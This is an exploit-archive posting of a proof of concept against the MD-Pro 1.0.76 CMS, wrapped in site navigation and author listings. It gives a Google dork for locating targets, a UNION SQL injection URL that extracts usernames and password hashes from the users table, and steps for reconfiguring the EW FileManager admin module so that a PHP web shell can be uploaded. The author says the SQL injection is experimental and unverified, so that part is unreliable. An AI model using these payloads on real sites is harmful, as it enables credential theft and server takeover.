MD-Pro 1.0.76 Shell Upload / SQL Injection

MD-Pro 1.0.76 Shell Upload / SQL Injection: Posted Oct 4, 2024; Authored by Emiliano Febbi; MD-Pro version 1.0.76 suffers from remote SQL injection and shell upload vulnerabilities.; tags | exploit, remote, shell, vulnerability, sql injection; SHA-256 | b641856919de4d5b0a61bc35a8e30fb6042f78f529af33b52af81ec5d5f73c4e; Download | Favorite | View

MD-Pro 1.0.76 Shell Upload / SQL Injection

# Exploit Title: MD-Pro 1.0.76. ( SQL injection + shell upload )
# Google Dork: intext: Powered by MD-Pro
# Date: 2024-08-30
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.opensourcecms.com/wp-content/uploads/MDPro-website-description.png
# Software Link: https://www.opensourcecms.com/mdpro/
# Version: 1.0.76.
# Tested on: Windows 10


        :::   :::   :::::::::                :::::::::  :::::::::   :::::::: 
      :+:+: :+:+:  :+:    :+:               :+:    :+: :+:    :+: :+:    :+: 
    +:+ +:+:+ +:+ +:+    +:+               +:+    +:+ +:+    +:+ +:+    +:+  
   +#+  +:+  +#+ +#+    +:+ +#++:++#++:++ +#++:++#+  +#++:++#:  +#+    +:+   
  +#+       +#+ +#+    +#+               +#+        +#+    +#+ +#+    +#+    
 #+#       #+# #+#    #+#               #+#        #+#    #+# #+#    #+#     
###       ### #########                ###        ###    ###  ######## #2024

      

[code] Proof of concept for MD-Pro 1.0.76. ( SQLi + shell upload )
-------------------------------------------------------------Part 1-------------------------------------------------------------------------------
The SQLi that I will introduce is an experimental stuff that I am not even 100% sure!

############################################################################################################################################################
#modules.php?op=modload&name=News&file=article&sid=-1 union all select 1,pn_name,3,4,5,6,7,pn_pass,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM md_users--#
############################################################################################################################################################


-------------------------------------------------------------Part 2--------------------------------------------------------------------------------
Vulnerability present in the MD-Pro module ' EW FileManager ' inside the admin panel.
The extensive query is: ' index.php?module=ew_filemanager&type=admin ' of the module, now you have to make changes:

1# Go to this address * index.php?module=ew_filemanager&type=admin&func=modifyconfig * and change these fields in this way:
in default's directory of users files insert ' ./ ' or  ' ../ '

2# Add this string in both to the modifiable extensions and to those of images ' htm,html,txt,php ' AND ' jpg,jpeg,png,bmp,gif,php ' (save all).

3# Now go to File Manager (now is activated) and you can upload the shell from the basic upload form.

[/code]

Top Authors In Last 30 Days

Red Hat 225 files
indoushka 182 files
Ubuntu 97 files
Gentoo 32 files
Debian 19 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

MD-Pro 1.0.76 Shell Upload / SQL Injection

MD-Pro 1.0.76 Shell Upload / SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MD-Pro 1.0.76 Shell Upload / SQL Injection

Share This

MD-Pro 1.0.76 Shell Upload / SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems